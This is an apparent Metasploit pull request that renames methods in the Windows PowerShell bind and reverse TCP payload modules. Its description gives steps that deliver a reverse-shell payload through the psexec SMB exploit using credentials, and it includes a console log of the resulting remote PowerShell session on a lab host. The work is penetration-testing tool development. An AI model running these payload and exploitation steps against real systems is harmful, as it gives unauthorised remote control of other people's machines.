### PR TITLE
deconflict the method names in mix-ins

### DIFF
--- a/lib/msf/core/payload/windows/powershell.rb
+++ b/lib/msf/core/payload/windows/powershell.rb
@@ -54,8 +54,8 @@ module Payload::Windows::Powershell
     return "#{cli} \"#{script}\""
   end
 
-  def generate
-    command_string
+  def command_string
+    powershell_command
   end
 end
 end

--- a/modules/payloads/singles/windows/powershell_bind_tcp.rb
+++ b/modules/payloads/singles/windows/powershell_bind_tcp.rb
@@ -15,7 +15,7 @@ require 'msf/core/handler/bind_tcp'
 ###
 module MetasploitModule
 
-  CachedSize = 1518
+  CachedSize = 1703
 
   include Msf::Payload::Windows::Exec
   include Rex::Powershell::Command

--- a/modules/payloads/singles/windows/powershell_bind_tcp.rb
+++ b/modules/payloads/singles/windows/powershell_bind_tcp.rb
@@ -53,7 +53,7 @@ module MetasploitModule
   #
   # Override the exec command string
   #
-  def command_string
+  def powershell_command
     generate_powershell_code("Bind")
   end
 end

--- a/modules/payloads/singles/windows/powershell_reverse_tcp.rb
+++ b/modules/payloads/singles/windows/powershell_reverse_tcp.rb
@@ -15,7 +15,7 @@ require 'msf/core/handler/reverse_tcp_ssl'
 ###
 module MetasploitModule
 
-  CachedSize = 1526
+  CachedSize = 1711
 
   include Msf::Payload::Windows::Exec
   include Msf::Payload::Windows::Powershell

--- a/modules/payloads/singles/windows/powershell_reverse_tcp.rb
+++ b/modules/payloads/singles/windows/powershell_reverse_tcp.rb
@@ -53,7 +53,7 @@ module MetasploitModule
   #
   # Override the exec command string
   #
-  def command_string
+  def powershell_command
     generate_powershell_code("Reverse")
   end
 end

--- a/modules/payloads/singles/windows/x64/powershell_bind_tcp.rb
+++ b/modules/payloads/singles/windows/x64/powershell_bind_tcp.rb
@@ -15,7 +15,7 @@ require 'msf/core/handler/bind_tcp'
 ###
 module MetasploitModule
 
-  CachedSize = 1518
+  CachedSize = 1786
 
   include Msf::Payload::Windows::Exec_x64
   include Rex::Powershell::Command

--- a/modules/payloads/singles/windows/x64/powershell_bind_tcp.rb
+++ b/modules/payloads/singles/windows/x64/powershell_bind_tcp.rb
@@ -53,7 +53,7 @@ module MetasploitModule
   #
   # Override the exec command string
   #
-  def command_string
+  def powershell_command
     generate_powershell_code("Bind")
   end
 end

--- a/modules/payloads/singles/windows/x64/powershell_reverse_tcp.rb
+++ b/modules/payloads/singles/windows/x64/powershell_reverse_tcp.rb
@@ -15,7 +15,7 @@ require 'msf/core/handler/reverse_tcp_ssl'
 ###
 module MetasploitModule
 
-  CachedSize = 1526
+  CachedSize = 1794
 
   include Msf::Payload::Windows::Exec_x64
   include Msf::Payload::Windows::Powershell

--- a/modules/payloads/singles/windows/x64/powershell_reverse_tcp.rb
+++ b/modules/payloads/singles/windows/x64/powershell_reverse_tcp.rb
@@ -53,7 +53,7 @@ module MetasploitModule
   #
   # Override the exec command string
   #
-  def command_string
+  def powershell_command
     generate_powershell_code("Reverse")
   end
 end


### PR DESCRIPTION
Fixes #10239 and fixes #10032.

This attempts to fix some deployments of powershell payloads.

Previously, we were not wrapping powershell commands in the exec mixin(?) and thus were embedding the powershell commands into the executable files as a string.  That went poorly.

This brings back (or adds for the first time?) that functionality and appears to fix all the problems that @wvu-r7  and I saw.

Unknown is how much this breaks in fixing the problem.
## Verification

List the steps needed to make sure this thing works
### Payload Generation
- [ ] Start `msfconsole`
- [ ] `use payload windows/x64/powershell_reverse_tcp`
- [ ] `set LHOST 127.0.0.1`
- [ ] `generate -f raw`
- [ ] verify you get exec-wrapped shellcode (there should be funny characters before the powershell command)
- [ ] `use payload windows/powershell_reverse_tcp`
- [ ] `set LHOST 127.0.0.1`
- [ ] `generate -f raw`
- [ ] verify you get exec-wrapped shellcode (there should be funny characters before the powershell command)
- [ ] `use payload windows/x64/powershell_bind_tcp`
- [ ] `set LHOST 127.0.0.1`
- [ ] `generate -f raw`
- [ ] verify you get exec-wrapped shellcode (there should be funny characters before the powershell command)
- [ ] `use payload windows/powershell_bind_tcp`
- [ ] `set LHOST 127.0.0.1`
- [ ] `generate -f raw`
- [ ] verify you get exec-wrapped shellcode (there should be finny characters before the powershell command)
- [ ] repeat for `msfconsole`
- [ ] Start `msfconsole`
- [ ] `use exploit/windows/smb/ms08_067_netapi`
### Exploitation use
- [ ] `use exploit/windows/smb/psexec` 
- [ ] `set rhost <target_ip>` 
- [ ] `set smbuser <administrator>` 
- [ ] `set smbpass <trustno1>` 
- [ ] `set payload windows/x64/powershell_reverse_tcp` 
- [ ] `set LHOST <lhost>` 
- [ ] `set LPORT <lport>` 
- [ ] `set verbose true` 


#Still confusing to me:
When the callback comes in, the session gets established quietly and the listener appears to hang:
```
msf5 payload(windows/powershell_bind_tcp) > use exploit/windows/smb/psexec
msf5 exploit(windows/smb/psexec) > set payload windows/x64/powershell_reverse_tcp
payload => windows/x64/powershell_reverse_tcp
msf5 exploit(windows/smb/psexec) > set lhost 192.168.135.111
lhost => 192.168.135.111
msf5 exploit(windows/smb/psexec) > set lport 4567
lport => 4567
msf5 exploit(windows/smb/psexec) > set rhost 192.168.132.173
rhost => 192.168.132.173
msf5 exploit(windows/smb/psexec) > set smbuser vagrant
smbuser => vagrant
msf5 exploit(windows/smb/psexec) > set smbpass vagrant
smbpass => vagrant
msf5 exploit(windows/smb/psexec) > set verbose
verbose => false
msf5 exploit(windows/smb/psexec) > set verbose true
verbose => true
msf5 exploit(windows/smb/psexec) > run

[*] Started reverse SSL handler on 192.168.135.111:4567 
[*] 192.168.132.173:445 - Connecting to the server...
[*] 192.168.132.173:445 - Authenticating to 192.168.132.173:445 as user 'vagrant'...
[!] 192.168.132.173:445 - No active DB -- Credential data will not be saved!
[*] 192.168.132.173:445 - Checking for System32\WindowsPowerShell\v1.0\powershell.exe
[*] 192.168.132.173:445 - PowerShell found
[*] 192.168.132.173:445 - Selecting PowerShell target
[*] 192.168.132.173:445 - Powershell command length: 4341
[*] 192.168.132.173:445 - Executing the payload...
[*] 192.168.132.173:445 - Binding to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.132.173[\svcctl] ...
[*] 192.168.132.173:445 - Bound to 367abb81-9844-35f1-ad32-98f038001003:2.0@ncacn_np:192.168.132.173[\svcctl] ...
[*] 192.168.132.173:445 - Obtaining a service manager handle...
[*] 192.168.132.173:445 - Creating the service...
[+] 192.168.132.173:445 - Successfully created the service
[*] 192.168.132.173:445 - Starting the service...
[+] 192.168.132.173:445 - Service start timed out, OK if running a command or non-service executable...
[*] 192.168.132.173:445 - Removing the service...
[+] 192.168.132.173:445 - Successfully removed the service
[*] 192.168.132.173:445 - Closing service handle...










^Cmsf5 exploit(windows/smb/psexec) > sessions -l

Active sessions
===============

  Id  Name  Type            Information  Connection
  --  ----  ----            -----------  ----------
  1         powershell win               192.168.135.111:4567 -> 192.168.132.173:49475 (192.168.132.173)

msf5 exploit(windows/smb/psexec) > sessions -i -1
[*] Starting interaction with 1...

Windows PowerShell running as user WIN10X64$ on WIN10X64
Copyright (C) 2015 Microsoft Corporation. All rights reserved.

PS C:\Windows\system32>ipconfig

Windows IP Configuration


Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . : moose
   Link-local IPv6 Address . . . . . : fe80::3195:4421:f77b:9e01%4
   IPv4 Address. . . . . . . . . . . : 192.168.132.173
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 192.168.132.254

Tunnel adapter isatap.moose:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : moose

Tunnel adapter Local Area Connection* 2:

   Media State . . . . . . . . . . . : Media disconnected
   Connection-specific DNS Suffix  . : 
PS C:\Windows\system32> exit
```

Still left: figure out what this breaks.....

